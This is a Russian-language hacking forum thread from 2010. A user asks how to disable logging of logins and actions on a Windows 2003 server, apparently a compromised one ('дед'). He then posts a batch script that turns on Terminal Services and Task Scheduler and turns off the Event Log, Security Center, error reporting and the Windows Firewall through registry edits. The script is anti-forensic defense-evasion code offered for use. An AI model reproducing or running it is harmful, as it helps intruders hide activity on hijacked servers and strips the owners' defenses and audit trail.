отключение логирования

Discussion in 'Уязвимости' started by SEWERN, 20 Apr 2010.

  1. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    33
    Likes Received:
    44
    Reputations:
    26
    Меня мучает один вопрос , как отключить логирование в win 2003 (входов на дед/действий) , способ чистки логов не подходит , интересует каким способом это можно выполнить ? Спасибо.
     
    5 people like this.
  2. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    Дабы не создавать новую тему, апну эту, что никто не знает?
     
    #2 h00lyshit!, 25 Apr 2010
    Last edited: 25 Apr 2010
  3. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    33
    Likes Received:
    44
    Reputations:
    26
    я знаю (помогли на грабере) . батник вида

    PHP:
    REM сначала текоторые включаем в автомат
    :: Fast User Switching Compatibility (Совместимость быстрого переключения пользователей
    :: 
    она позволит переключаться между пользователями без закрытия работающих программчто бывают очень удобно.
    REG add HKLM\SYSTEM\CurrentControlSet\Services\FastUserSwi tchingCompatibility /v Start /t REG_DWORD /d 2 /f
    :: Secondary Logon (Вторичный вход в систему)
    REG add HKLM\SYSTEM\CurrentControlSet\Services\seclogon /v Start /t REG_DWORD /d 2 /f
    :: Task Scheduler (Планировщик заданий)
    REG add HKLM\SYSTEM\CurrentControlSet\Services\Scheduler /v Start /t REG_DWORD /d 2 /f
    :: Terminal Services (Службы терминалов)
    REG add HKLM\SYSTEM\CurrentControlSet\Services\TermService /v Start /t REG_DWORD /d 2 /f


    REM а теперь те
    что отключаем
    :: убиваем самое главое EventLogпараллельно EventSystem
    REG add HKLM
    \SYSTEM\CurrentControlSet\Services\EventSystem /v Start /t REG_DWORD /d 4 /f
    REG add HKLM
    \SYSTEM\CurrentControlSet\Services\Eventlog /v Start /t REG_DWORD /d 4 /f
    :: убиваем Alerter (ОповещательПосылает выбранным пользователям и компьютерам административные оповещения.
    REG add HKLM\SYSTEM\CurrentControlSet\Services\Alerter /v Start /t REG_DWORD /d 4 /f
    :: Error Reporting Service (Служба регистрации ошибок)
    REG add HKLM\SYSTEM\CurrentControlSet\Services\ERSvc /v Start /t REG_DWORD /d 4 /f
    :: Security Center (Центр обеспечения безопасности)
    REG add HKLM\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f
    :: System Event Notification (Уведомление о системных событиях)
    REG add HKLM\SYSTEM\CurrentControlSet\Services\SENS /v Start /t REG_DWORD /d 4 /f
    :: Windows Firewall/Internet Connection Sharing (Брандмауэр Windows Общий доступ к Интернету (ICS))
    REG add HKLM\SYSTEM\CurrentControlSet\Services\SharedAcces s /v Start /t REG_DWORD /d 4 /f
    рестарт дед после батника.
     
Loading...
Similar Threads - отключение логирования
  1. ZagZag
    Replies:
    6
    Views:
    12,385